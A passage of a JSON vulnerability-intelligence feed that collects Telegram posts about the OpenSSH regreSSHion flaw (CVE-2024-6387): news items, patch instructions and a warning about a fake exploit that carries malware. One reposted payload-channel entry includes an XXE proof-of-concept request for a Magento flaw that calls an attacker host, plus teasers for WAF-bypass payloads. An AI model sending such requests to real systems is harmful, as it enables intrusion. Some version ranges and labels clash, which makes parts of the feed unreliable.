\u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430\u043c SSH 2.0 \u0438 SFTP \u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 OpenSSH 9.8. \u0412 \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6387 (\u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c regreSSHion), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d \u043f\u0430\u0442\u0447 \u043f\u0440\u043e\u0442\u0438\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0430\u0442\u0430\u043a \u043f\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u043c \u043a\u0430\u043d\u0430\u043b\u0430\u043c \u0438 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u041f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0430\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f OpenSSH 9.7 \u0432\u044b\u0448\u043b\u0430 \u0432 \u043c\u0430\u0440\u0442\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n#\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0430", "creation_timestamp": "2024-07-02T09:22:36.000000Z"}, {"uuid": "c1947cad-91c1-44ca-888d-ea624de33745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/habr_com_news/29046", "content": "1 \u0438\u044e\u043b\u044f 2024 \u0433\u043e\u0434\u0430 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u043e \u0418\u0411 \u0438\u0437 Qualys \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0447\u0442\u043e \u0432 OpenSSH (\u0441 \u0432\u0435\u0440\u0441\u0438\u0438 >= 8.5 \u0438 < 4.4) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6387 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c regreSSHion, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u041f\u041a \u0441\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u043e\u0439 Glibc.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c", "creation_timestamp": "2024-07-02T06:30:27.000000Z"}, {"uuid": "3852ba6a-a860-452a-afe8-79942bec4d79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/sVyk121LntmKV69-vmxI6apy9e58ruD65f2LYhSjqVF3jw", "content": "", "creation_timestamp": "2024-07-01T11:48:38.000000Z"}, {"uuid": "4dabaf2c-d0a8-4016-a98b-c15e2237214c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/disasm_me_ch/338", "content": "CVE-2024-6387 - regreSSHion: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server\n\nDebian Security\n\u0417\u0430\u0440\u0435\u043f\u043e\u0440\u0442\u0438\u043b\u0438 Qualyz Threat Research Unit, \u043d\u043e\u0432\u043e\u0441\u0442\u044c \u043e\u0442 \u043d\u0438\u0445\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 openssh server, \u0437\u0430\u043d\u0435\u0441\u0451\u043d\u043d\u0430\u044f \u043a\u043e\u043c\u043c\u0438\u0442\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0435\u0444\u0430\u043a\u0442\u043e\u0440\u0438\u043b \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043b\u043e\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 8.5.p1 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e 9.8p1 (\u0432\u044b\u0448\u043b\u0430 7 \u0447\u0430\u0441\u043e\u0432 \u043d\u0430\u0437\u0430\u0434) .\n\n\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043a\u0430\u043a\u0430\u044f \u0443 \u0432\u0430\u0441 \u0441\u0435\u0439\u0447\u0430\u0441 \u0432\u0435\u0440\u0441\u0438\u044f: sshd -V\n\u041e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e \u0432\u0430\u0448\u0435\u0433\u043e \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430: nc ip-or-domain 22\n\nSecurity-\u043f\u0430\u0442\u0447\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u0445 Ubuntu \u0438 Debian:\napt update\nsudo apt install --upgrade openssh-server openssh-sftp-server openssh-client\n\n\u041a\u0430\u043a \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u0442\u044c\u0441\u044f \u0438\u0437 \u0441\u043e\u0440\u0441\u043e\u0432 (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0432\u044b \u0437\u043d\u0430\u0435\u0442\u0435, \u0447\u0442\u043e \u0434\u043e \u0432\u0430\u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u0434\u043e\u043b\u0435\u0442\u0438\u0442, \u0442\u0430\u043a \u043a\u0430\u043a \u0441\u043f\u043e\u0441\u043e\u0431 \u043d\u0430\u0440\u0443\u0448\u0430\u0435\u0442 \u043f\u0440\u0438\u043d\u0446\u0438\u043f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u043a\u0435\u0442\u0430\u043c\u0438): \n\u041d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439 \u0441\u043b\u0443\u0447\u0430\u0439 \u0441\u0434\u0435\u043b\u0430\u043b \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044e \u043f\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 9.8p1 \u043d\u0430 Debian-based (Debian, Ubuntu, Mint, ...):\n\napt-get update\napt-get install build-essential zlib1g-dev libssl-dev libpam0g-dev libselinux1-dev\nwget https://github.com/openssh/openssh-portable/archive/refs/tags/V_9_8_P1.tar.gz\ntar -xzf V_9_8_P1.tar.gz\ncd openssh-portable-V_9_8_P1\n./configure\nmake\nmake install\nmv /usr/sbin/sshd /usr/sbin/sshd.bak\nln -s /usr/local/sbin/sshd /usr/sbin/sshd\nmkdir -p /usr/local/etc && for file in /etc/ssh/*; do [ -f \"$file\" ] && ln -s \"$file\" /usr/local/etc/; done\nsystemctl restart sshd\n\n\n\u2014\u2014\u2014\n\u0421\u0435\u0439\u0447\u0430\u0441 \u0433\u0443\u043b\u044f\u0435\u0442 \u0430\u0440\u0445\u0438\u0432 \u0441 poc \u043e\u0442 7etsuo, \u043e\u043d \u043b\u0435\u0436\u0430\u043b \u0437\u0434\u0435\u0441\u044c: https://github.com/7etsuo/cve-2024-6387-poc/ - \u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441 \u0442\u0443\u0442 404. \u041e\u0434\u0438\u043d \u0438\u0437 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043a\u043e\u043c\u043c\u0438\u0442\u043e\u0432 \u0433\u043b\u0430\u0441\u0438\u043b, \u0447\u0442\u043e \"poc \u043d\u0435\u0440\u0430\u0431\u043e\u0447\u0438\u0439, \u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043e\u0439\u0434\u0451\u0442\"\n\n\u0412 \u0441\u0442\u0430\u0442\u044c\u0435 Qualyz Threat Research Unit \u0435\u0441\u0442\u044c \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0435 \u0437\u0430\u0442\u044f\u0433\u0438\u0432\u0430\u0439\u0442\u0435 \u0441 \u0430\u043f\u0434\u0435\u0439\u0442\u043e\u043c.", "creation_timestamp": "2024-07-01T18:00:19.000000Z"}, {"uuid": "f2f16aa7-c050-4300-bae5-ebefaeb9fd1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/breachdetector/804719", "content": "{\n  \"Source\": \"Darkforums[.]st\",\n  \"Content\": \"[CVE-2024-6387] Remote Code Exec in OpenSSH (regreSSHion) \u2013 Critical Race Condition i\", \n  \"author\": \"GenosX\",\n  \"Detection Date\": \"07 Jul 2025\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2025-07-07T18:38:01.000000Z"}, {"uuid": "719daa10-08e6-4a63-a104-a0448d5870d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/CyberBulletin/18", "content": "\u26a1 #VULNERABILITIES\n\nMillions of OpenSSH servers could be vulnerable to unauthenticated remote code execution due to a vulnerability tracked as regreSSHion and CVE-2024-6387.", "creation_timestamp": "2024-07-03T10:16:35.000000Z"}, {"uuid": "53199ccf-c332-4cc1-be1e-f53fa03f39c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/GithubRedTeam/8408", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for the vulnerability CVE-2024-43044 in Jenkins\nURL\uff1ahttps://github.com/identity-threat-labs/Article-RegreSSHion-CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-29T15:19:28.000000Z"}, {"uuid": "c9a2a050-1e5d-4922-bce5-d06234244fd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://t.me/cyber_hsecurity/1608", "content": ":\n\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 wanEditor v4.7.11 \u0648\u062a\u0645 \u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u064a\u0646 v.4.7.12 \u0648v.5\u060c \u0648\u0647\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0646\u0635\u064a\u0629 \u0639\u0628\u0631 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 (XSS) \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0648\u0631.\n\nhttps://gist.github.com/Mdxjj/5cf0a31e8abf24ed688ceb5b3543516d\n\n\u0647\u0646\u0627\u0643 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a Debezium Community debezium-ui v.2.5 \u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629 \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0635\u0641\u062d\u0629.\n\nhttps://packetstormsecurity.com/files/178794/Debezium-UI-2.5-Credential-Disclosure.html\n\n\u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u0645\u062d IBM Security Verify Access Docker 10.0.0 \u062d\u062a\u0649 10.0.6 \u0644\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u062d\u0644\u064a \u0628\u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u0628\u0633\u0628\u0628 \u0627\u0644\u062a\u062d\u0642\u0642 \u063a\u064a\u0631 \u0627\u0644\u0635\u062d\u064a\u062d \u0645\u0646 \u0627\u0644\u0634\u0647\u0627\u062f\u0629. \u0645\u0639\u0631\u0641 IBM X-Force: 292416.\n\nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/292416\n\n\u064a\u0632\u064a\u0644 javascript-deobfuscator \u062a\u0642\u0646\u064a\u0627\u062a \u062a\u0634\u0648\u064a\u0634 JavaScript \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0623\u062b\u0631\u0629\u060c \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a \u0627\u0644\u0645\u0639\u062f\u0629 \u0648\u0627\u0644\u062a\u064a \u062a\u0633\u062a\u0647\u062f\u0641 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631 \u0625\u0644\u0649 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629. \u0644\u0642\u062f \u062a\u0645 \u062a\u0635\u062d\u064a\u062d \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 1.1.0. \u064a\u064f\u0646\u0635\u062d \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b. \u064a\u062c\u0628 \u0639\u0644\u0649 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646 \u063a\u064a\u0631 \u0627\u0644\u0642\u0627\u062f\u0631\u064a\u0646 \u0639\u0644\u0649 \u0627\u0644\u062a\u0631\u0642\u064a\u0629 \u062a\u0639\u0637\u064a\u0644 \u0645\u064a\u0632\u0629 \u062a\u0628\u0633\u064a\u0637 \u0627\u0644\u062a\u0639\u0628\u064a\u0631.\n\nhttps://github.com/ben-sb/javascript-deobfuscator/commit/630d3caec83d5f31c5f7a07e6fadf613d06699d6\n\n\u062d\u0633\u064a\u0646 \u0631\u0648\u0632\u0643\u0627\u0631:\nCVE-2024-36684\nCRITICAL\nInformation\nCPEs\nPlugins\nDescription\nIn the module \"Custom links\" (pk_customlinks) <= 2.3 from Promokit.eu for PrestaShop, a guest can perform SQL injection. The script ajax.php have a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection.\nReferences\nhttps://security.friendsofpresta.org/modules/2024/06/18/pk_customlinks.html\n\nALSED404:\npayload\n\n\n\n\n\n#Payload\n===================================\n#ALSED404\n\nCVE-2024-34102\u00a0 POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CVE #POC\n\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation & filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\nXSS WAF Bypass by multi-char HTML entities\n\nfj translates to fj\n>⃒ translates to > + [?]\n<⃒ translates to < + [?]\n\n[?] - Unicode symbol\n\n#BugBounty #Tips\n===================================\n#ALSED404\n\nA Cloudflare WAF bypass combining simple (but efficient) tricks\n\n\n\nA payload with some obfuscation & filter evasion tricks\n\n\n\n#CF #WAF #Bypass #Payload\n===================================\n#ALSED404\n\n\u0647\u0627 \u062c\u0645\u0627\u0639\u0629 \u0627\u0644\u0627\u064a\u0641\u0648\u0646 \ud83d\ude02\ud83d\ude02\ud83d\ude02\ud83d\ude02\n\ud83d\udd12 \u0645\u0637\u0648\u0631\u064a iOS \u0648macOS\u060c \u062a\u0646\u0628\u064a\u0647!\n\n\u0627\u0643\u062a\u0634\u0641 \u0643\u064a\u0641 \u064a\u0645\u0643\u0646 \u0623\u0646 \u062a\u0624\u062f\u064a 3 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u062c\u062f\u064a\u062f\u0629 \u0641\u064a CocoaPods\u060c \u0625\u062d\u062f\u0649 \u0623\u062f\u0648\u0627\u062a \u0645\u0637\u0648\u0631\u064a Apple \u0627\u0644\u0634\u0647\u064a\u0631\u0629\u060c \u0625\u0644\u0649 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0639\u0644\u0649 \u062a\u0637\u0628\u064a\u0642\u0627\u062a iOS \u0648macOS.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0647\u0646\u0627: https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html\n#ALSED404\n\nPayload XSS: \n\n\n#Payload #XSS\n===================================\n#ALSED404\n\nDiscovered an XSS vulnerability but Imperva WAF blocked it?\nTry this XSS payload to bypass Imperva's protection.\n\n\n\n\n#BugBounty #Bypass_Imperva #Payload #XSS\n===================================\n#ALSED404\n\n\u062b\u063a\u0631\u0629 \u062c\u062f\u064a\u062f\u0629 \u0628\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 OpenSSH \u062a\u0646\u0637\u064a RCE \n\ud83d\udea8 New OpenSSH vulnerability (CVE-2024-6409) found in RHEL 9's versions 8.7p1 & 8.8p1, allowing RCE via race condition in privsep child process. \n\nRead: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html \n\n\u26a0\ufe0f Active exploits detected! This bug is distinct from CVE-2024-6387 but shares similarities.\n#ALSED404", "creation_timestamp": "2024-12-13T19:00:21.000000Z"}, {"uuid": "2d113eda-b60d-4660-be60-e7e48903b9af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/1329", "content": "\ud83c\udfa3 \u041d\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a regreSSHion \u043b\u043e\u0432\u044f\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0418\u0411\n\n\u0412 \u0441\u043e\u0446\u0441\u0435\u0442\u0438, \u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Twitter, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0430\u0440\u0445\u0438\u0432, \u044f\u043a\u043e\u0431\u044b \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043f\u0440\u043e\u0432\u043e\u0434\u044f\u0449\u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0441\u0432\u0435\u0436\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 OpenSSH (CVE-2024-6387). \u041f\u043e \u043b\u0435\u0433\u0435\u043d\u0434\u0435 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430. \n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043d\u0430\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u044d\u0442\u043e\u0442 \u0430\u0440\u0445\u0438\u0432 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u043c\u0430\u043d\u043a\u043e\u0439 \u0434\u043b\u044f \u043b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u044b\u0445 \u0418\u0411-\u0448\u043d\u0438\u043a\u043e\u0432. \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432\u043c\u0435\u0441\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0442\u0430\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0435\u0433\u043e \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434, \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u043d\u0430 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0440\u0430\u043d\u0435\u0435 \u0433\u0443\u043b\u044f\u0432\u0448\u0435\u0433\u043e \u043f\u043e \u0441\u0435\u0442\u0438 \u0444\u0435\u0439\u043a\u043e\u0432\u043e\u0433\u043e PoC \u043a \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438 \u043d\u0430\u0431\u043e\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432. \u041e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445, \u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0430 Python, \u0438\u043c\u0438\u0442\u0438\u0440\u0443\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u043e \u0441\u043f\u0438\u0441\u043a\u0443 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u0430 \u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b exploit, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a, \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0437\u0430\u043f\u0438\u0441\u0438 \u0444\u0430\u0439\u043b\u0430 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 /etc/cron.hourly. \u0422\u0430\u043a\u0436\u0435 \u043e\u043d \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442 \u0444\u0430\u0439\u043b ls \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0432 \u043d\u0435\u0433\u043e \u0441\u0432\u043e\u044e \u043a\u043e\u043f\u0438\u044e, \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u044e\u0449\u0443\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u0440\u0438 \u043a\u0430\u0436\u0434\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u043d\u0435\u0445\u0438\u0442\u0440\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u044e\u0442 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0418\u0411-\u0441\u043b\u0443\u0436\u0431\u044b 